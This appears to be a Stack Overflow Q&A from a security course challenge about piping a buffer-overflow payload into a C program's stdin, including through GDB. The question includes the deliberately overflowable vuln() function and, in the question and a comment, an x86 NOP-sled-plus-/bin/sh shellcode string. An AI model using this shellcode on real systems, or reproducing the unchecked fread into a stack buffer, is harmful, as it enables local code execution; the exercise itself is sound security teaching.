# How to use a script to control the program's input?

Tags: python, c

I need to control the input of a simple program written in C. I'm working on a Linux virtual machine (it's a computer security challenge) and I'm using GDB to find a good exploit (in this case it's a buffer overflow). 
Here's the code:

```c
static const char KEY[] = "BLOCKCHAIN";

void vuln(){
    int i;
    char buffer[616];

    int output = fread(buffer, 1, 4*1024, stdin);

    for (i = 0; i < 616; i++) {
      buffer[i] ^= KEY[i % sizeof(KEY)];
    }  

    printf("%s\n", buffer);
}

int main(int argc, char *argv[]){
    vuln();
    exit(0);
}
```

The line I want to cover is `int output = fread(buffer, 1, 4*1024, stdin);`. Is there a way to control the input of that program (so the input stream) with a simple script? I want to do something like:

```
./vuln_program `python -c 'print("\x90"*923+"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"+"\x48\xbf\xff\xff")'`
```

This works if It were an argument of the main but unfortunately I'm inside the vuln() function and can't do this. Professors suggested to use: Python's subprocess module, or read\write from\to a named pipe (mkfifo), or the process module of theuse the pwntools Python library but I don't know how to use them in this scenario.

Thanks in advance.

Answer (score 1, accepted):

You can do something like

```sh
$ python -c "exploit code" | ./vuln
```

Comment: Nice, this seems to be the correct path to follow. But can I do this inside gdb aswell? If i go ```gdb vuln``` and then, inside the debugger, ```python print "exploit code" | run``` it doesn't work.

Comment: I dont think you can do that. Try: python -c "code" | gdb --args ./vuln -ex=run

Comment: I found it I think. Once inside gdb, it's done with "Here strings".
```r <<< $(python -c "print('exploit code')")```. [Run a python command with “run” on GDB](https://reverseengineering.stackexchange.com/questions/18552/run-a-python-command-with-run-on-gdb)

Answer (score 1):

Everything generated by python will be in arguments not in stdin. If you need to pass something to stdin you need to do: `./vuln_program < file_with_stdin_data`
it doesn't need python at all to put some defined data to input stream, you can have data in normal file.

You can use python subprocess module to communicate with your script. Then you need to create subprocess and write something to its stdin. Check for [python doc](https://docs.python.org/2/library/subprocess.html) this:

Comment: Ok so essentially if I want to pass to stdin a one single string (ex.: "\x90\x90\x90\x90[...]\x90\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh\x48\xbf\xff\xffAA[...]AA, I can put this in a txt file and then do ```./vuln_program < mytext.txt``` ? The thing is that I can do this manually (copy&paste) but it doesn't get formatted into hexadecimal format but simple text string, while with ```python -c print("\x blabla")``` it does.

Comment: But you can have a binary file, your print message nothing else than conversion from hex symbols representation to actual bytes. If it's hard for you to prepare, then it's better to do what @blinkofaneye suggested.

Answer (score 0):

As @blinkofaneye said, the simplest solution is using `$ python -c "exploit code" | ./vuln`

If you have to do it inside GDB (like me) as already suggested in this question [Run a python command with “run” on GDB](https://reverseengineering.stackexchange.com/questions/18552/run-a-python-command-with-run-on-gdb), the trick is to enter GDB and than use "Here strings":

`run <<< $(python -c "print('exploit code')")`